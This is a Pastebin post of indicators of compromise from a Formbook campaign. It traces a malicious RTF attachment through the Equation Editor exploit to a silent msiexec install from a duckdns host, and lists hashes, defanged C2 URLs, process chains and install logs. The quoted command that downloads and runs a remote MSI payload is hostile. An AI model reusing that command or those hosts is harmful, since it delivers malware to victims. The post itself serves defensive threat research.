Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #formbook #RTF11882 #exe2msi #opendir
- https://pastebin.com/H2mkW82S
- previous_contact:
- 22/04/19 https://pastebin.com/1FMBBK3N
- 26/02/19 https://pastebin.com/yLu1cL9K
- 15/11/18 https://pastebin.com/VFG89LnT
- 14/11/18 https://pastebin.com/D6VPDyyz
- FAQ:
- http://www.exetomsi.com/freeware
- attack_vector
- --------------
- email attach .doc (RTF) > 11882 > msiexec GET msi > install (broken)
- email_headers
- --------------
- n/a
- files
- --------------
- SHA-256 167441aa99bbbe621a775528f8c20724c6091e65d80fdf700389f0c9af41ead7
- File name PO-20190507.doc [RTF]
- File size 311.08 KB (318542 bytes)
- SHA-256 1c9fe57b3adaa58d86bcc8f683d6496c1ce40ee468434d768543910e8442f999
- File name 1.msi [MSI Installer, Exe to msi converter free]
- File size 556 KB (569344 bytes)
- SHA-256 f6c6bed0e6a223f26de874256e0ce8443a6203634aa2d2871c0cbec73adcb397
- File name MSID06.tmp [PE32 executable (GUI) Intel 80386, for MS Windows]
- File size 530.5 KB (543232 bytes)
- activity
- **************
- PL_SCR h11p:\ joeing2{.} duckdns{.} org/joe/1.msi
- C2 h11p:\kvkhbw{.} com/jo/
- h11p:\7hprd{.} com/jo/
- h11p:\.atlanticpressftp{.} com/jo/
- h11p:\mohammadarif.info/jo/
- h11p:\tdoog{.} com/jo/
- h11p:\macounty{.} com/jo/
- h11p:\aufdemweg.one/jo/
- h11p:\interactivenetworksystems{.} com/jo/
- cmd.exe & /C CD C: & msiexec.exe /i h11p:\ joeing2{.} duckdns{.} org/joe/1.msi /quiet
- Error 1722. There is a problem with this Windows Installer package.
- A program run as part of the setup did not finish as expected.
- Contact your support personnel or package vendor.
- Action _B3D13F97_1369_417D_A477_B4C42B829328, location: C:\Windows\Installer\MSI49E9.tmp, command: /S
- === Logging stopped: ??.??.2019 11:24:24 ===
- netwrk
- --------------
- 23.249.162.144 joeing2{.} duckdns{.} org GET /joe/1.msi HTTP/1.1 Windows Installer
- comp
- --------------
- msiexec.exe 3096 TCP localhost 50104 23.249.162.144 80 ESTABLISHED
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- ... [not children, another context]
- "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
- ... [not children, another context]
- C:\Windows\SysWOW64\cmd.exe & /C CD C: & msiexec.exe /i http://joeing2{.} duckdns{.} org/joe/1.msi /quiet
- C:\Windows\SysWOW64\msiexec.exe /i http://joeing2{.} duckdns{.} org/joe/1.msi /quiet
- ... [not children, another context]
- C:\Windows\system32\msiexec.exe
- "C:\Windows\Installer\MSI49E9.tmp" /S
- persist
- --------------
- n/a
- drop
- --------------
- C:\Windows\Installer\MSI49E9.tmp
- %temp%\MSI6769f.LOG
- # # #
- https://www.virustotal.com/gui/file/167441aa99bbbe621a775528f8c20724c6091e65d80fdf700389f0c9af41ead7/details
- https://www.virustotal.com/gui/file/1c9fe57b3adaa58d86bcc8f683d6496c1ce40ee468434d768543910e8442f999/details
- https://www.virustotal.com/gui/file/f6c6bed0e6a223f26de874256e0ce8443a6203634aa2d2871c0cbec73adcb397/details
- https://analyze.intezer.com/#/analyses/33fac682-f65f-4ecd-82c5-1abf759a07a7
- https://analyze.intezer.com/#/analyses/5b072d73-73f0-404a-ac75-3141ed972a9e
- https://www.virustotal.com/gui/file/e22634d0f10eb26fe0503478c8027a0eabe734006e664014ada5e09a58097e91/details
- https://analyze.intezer.com/#/analyses/2aaf18fe-3d54-4ca9-a002-32cad1f3f985
- VR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement